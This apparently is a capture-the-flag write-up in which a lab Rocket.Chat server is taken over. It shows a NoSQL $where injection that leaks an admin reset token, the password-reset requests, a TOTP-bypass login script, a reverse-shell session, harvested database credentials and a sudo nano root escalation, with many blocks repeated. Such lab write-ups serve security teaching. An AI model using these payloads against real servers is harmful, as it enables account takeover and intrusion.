July 4, 2026
{HSM} Exception
Enumeration
By Nihat Rashidli
2 min read
Enumeration
Nmap scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 62 OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:7c:3a:db:22:76:47:d9:29:af:da:cd:0d:1b:22:d5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAeLY/rLtwv0qk2/SFFpZzsW3IPmAKawKPP+tHxArRloDe8ON2q7olsI+LxEf+0Ih9ShCAgRpZPETKq+RykwDzE=
| 256 45:65:36:61:8d:79:c3:dc:f7:a1:71:37:7d:f1:a1:cf (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFvO+F/PDZZ2uWnq9XijgAX82ApWsZuRinXeoki037iw
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.58 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Exception
|_http-server-header: Apache/2.4.58 (Ubuntu)
3000/tcp open ppp? syn-ack ttl 61
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 62 OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:7c:3a:db:22:76:47:d9:29:af:da:cd:0d:1b:22:d5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAeLY/rLtwv0qk2/SFFpZzsW3IPmAKawKPP+tHxArRloDe8ON2q7olsI+LxEf+0Ih9ShCAgRpZPETKq+RykwDzE=
| 256 45:65:36:61:8d:79:c3:dc:f7:a1:71:37:7d:f1:a1:cf (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFvO+F/PDZZ2uWnq9XijgAX82ApWsZuRinXeoki037iw
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.58 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Exception
|_http-server-header: Apache/2.4.58 (Ubuntu)
3000/tcp open ppp? syn-ack ttl 61
SSH(22)
┌──(kali㉿kali)-[~/hacksmarter/exception]
└─$ ssh root@exception.hsm
The authenticity of host 'exception.hsm (10.1.185.172)' can't be established.
ED25519 key fingerprint is: SHA256:Ef/OWUCxZP04+ByuRVegbjuQjqITaL4tnrWxn7bVtmk
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'exception.hsm' (ED25519) to the list of known hosts.
root@exception.hsm's password:┌──(kali㉿kali)-[~/hacksmarter/exception]
└─$ ssh root@exception.hsm
The authenticity of host 'exception.hsm (10.1.185.172)' can't be established.
ED25519 key fingerprint is: SHA256:Ef/OWUCxZP04+ByuRVegbjuQjqITaL4tnrWxn7bVtmk
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'exception.hsm' (ED25519) to the list of known hosts.
root@exception.hsm's password:- Password-based authentication — so we need credentials to log in
HTTP(80)
- After running dirsearch only
robots.txtwas found - Chatgpt kinda thing
- Page source reveals that this is just rabbit hole because it does not process anything and it doesn't do anything so this means it doesn't send request and i can't intercept anything
HTTP(3000)
- There is rocket.chat sofware which is used for team communication
- Also this website is using Mongo Database — so we can try a few NoSQL injection payloads
- We tried a few payloads but it seems that it is not vulnerable to NoSQL injection
- We can also register account
- When we are logging in sends our password not in plaintext but it hashes it to sha-256
Our account credentials:
ferka:password123
Exploitation
After creating account there is channel called general in which we can find admin user and his email address
There is email localh0ste@exception.local
we can find out more about the version. There may be known vulnerabilities
<http://exception.hsm:3000/api/info>
GET /api/v1/users.list?query={"$where"%3a"this.username==='localh0ste'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"} HTTP/1.1<http://exception.hsm:3000/api/info>
GET /api/v1/users.list?query={"$where"%3a"this.username==='localh0ste'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"} HTTP/1.1Reset token acquired: yKGvYi9tSTuGO2YBIqt3OTM-U9aMS1TN-gi1cLdkoMA
POST /api/v1/method.callAnon/resetPassword HTTP/1.1
Host: exception.hsm:3000
User-Agent: Electron/
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <http://192.168.0.146:3000/channel/general>
Content-Type: application/json
X-User-Id: dntHe7AnzXpXnP5Gd
X-Auth-Token: KCBP63FF0t1Ur2PyYwiMLB1eZrm7nvLUrLUJLJr4_yk
X-Requested-With: XMLHttpRequest
Content-Length: 142
Origin: <http://exception.hsm:3000>
Connection: keep-alive
Cookie: rc_uid=dntHe7AnzXpXnP5Gd; rc_token=KCBP63FF0t1Ur2PyYwiMLB1eZrm7nvLUrLUJLJr4_yk
{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"yKGvYi9tSTuGO2YBIqt3OTM-U9aMS1TN-gi1cLdkoMA\\",\\"P@$$w0rd!1234\\"]}"}
{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"yKGvYi9tSTuGO2YBIqt3OTM-U9aMS1TN-gi1cLdkoMA\\",\\"P@$$w0rd!1234\\"]}"}POST /api/v1/method.callAnon/resetPassword HTTP/1.1
Host: exception.hsm:3000
User-Agent: Electron/
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <http://192.168.0.146:3000/channel/general>
Content-Type: application/json
X-User-Id: dntHe7AnzXpXnP5Gd
X-Auth-Token: KCBP63FF0t1Ur2PyYwiMLB1eZrm7nvLUrLUJLJr4_yk
X-Requested-With: XMLHttpRequest
Content-Length: 142
Origin: <http://exception.hsm:3000>
Connection: keep-alive
Cookie: rc_uid=dntHe7AnzXpXnP5Gd; rc_token=KCBP63FF0t1Ur2PyYwiMLB1eZrm7nvLUrLUJLJr4_yk
{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"yKGvYi9tSTuGO2YBIqt3OTM-U9aMS1TN-gi1cLdkoMA\\",\\"P@$$w0rd!1234\\"]}"}
{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"yKGvYi9tSTuGO2YBIqt3OTM-U9aMS1TN-gi1cLdkoMA\\",\\"P@$$w0rd!1234\\"]}"}Username : localh0ste
Password : P@$$w0rd!1234
But we get to enter code, but there is TOTP bypass code
const USER = "target";
const PASSWORD = "correct horse battery staple";
fetch("/api/v1/login", {
method: "POST",
body: `{
"cas": true,
"totp": {
"code": "Not Today",
"type": "resume",
"login": {
"user": {
"username": "${USER}"
},
"password": "${PASSWORD}"
}
}
}`,
headers: {
"Content-Type": "application/json"
}
})
.then(res => res.json())
.then(({ data: { userId, authToken }}) => {
console.log(`login as ${userId}`);
Meteor._localStorage.setItem(Accounts.USER_ID_KEY, userId);
Meteor._localStorage.setItem(Accounts.LOGIN_TOKEN_KEY, authToken);
window.location.reload()
});const USER = "target";
const PASSWORD = "correct horse battery staple";
fetch("/api/v1/login", {
method: "POST",
body: `{
"cas": true,
"totp": {
"code": "Not Today",
"type": "resume",
"login": {
"user": {
"username": "${USER}"
},
"password": "${PASSWORD}"
}
}
}`,
headers: {
"Content-Type": "application/json"
}
})
.then(res => res.json())
.then(({ data: { userId, authToken }}) => {
console.log(`login as ${userId}`);
Meteor._localStorage.setItem(Accounts.USER_ID_KEY, userId);
Meteor._localStorage.setItem(Accounts.LOGIN_TOKEN_KEY, authToken);
window.location.reload()
});Then we are in as admin account
Getting RCE
┌──(root㉿kali)
└─# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.200.68.253] from (UNKNOWN) [10.1.253.177] 46078
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
rocketchat@9593cc10a7dd:/app/bundle/programs/server$ id
id
uid=65533(rocketchat) gid=65533(rocketchat) groups=65533(rocketchat)
rocketchat@9593cc10a7dd:/app/bundle/programs/server$ whoami
whoami
rocketchat
rocketchat@9593cc10a7dd:/app/bundle/programs/server$┌──(root㉿kali)
└─# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.200.68.253] from (UNKNOWN) [10.1.253.177] 46078
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
rocketchat@9593cc10a7dd:/app/bundle/programs/server$ id
id
uid=65533(rocketchat) gid=65533(rocketchat) groups=65533(rocketchat)
rocketchat@9593cc10a7dd:/app/bundle/programs/server$ whoami
whoami
rocketchat
rocketchat@9593cc10a7dd:/app/bundle/programs/server$Post-Exploitation
Getting dabatase username and password
rocketchat@9593cc10a7dd:/$ cat Backup_db.txt
DATABASE_USER=Ron
DATABASE_PASSWORD=AtentiouSenoU
DATABASE_NAME=chatty
DATABASE_HOST=localhostrocketchat@9593cc10a7dd:/$ cat Backup_db.txt
DATABASE_USER=Ron
DATABASE_PASSWORD=AtentiouSenoU
DATABASE_NAME=chatty
DATABASE_HOST=localhostRon:AtentiouSenoU
Then we ssh
Enumeration as Ron
Getting root access!!
Ron@Chatty:/tmp$ sudo -l
Matching Defaults entries for Ron on Chatty:
env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty
User Ron may run the following commands on Chatty:
(root) NOPASSWD: /opt/log_inspector/check_log --cleanRon@Chatty:/tmp$ sudo -l
Matching Defaults entries for Ron on Chatty:
env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty
User Ron may run the following commands on Chatty:
(root) NOPASSWD: /opt/log_inspector/check_log --cleanWe can run /opt/log_inspector/check_log --clean as root and it gets us into nano as root and by pressing CTRL +T we can execute commands as root and then we just get root shell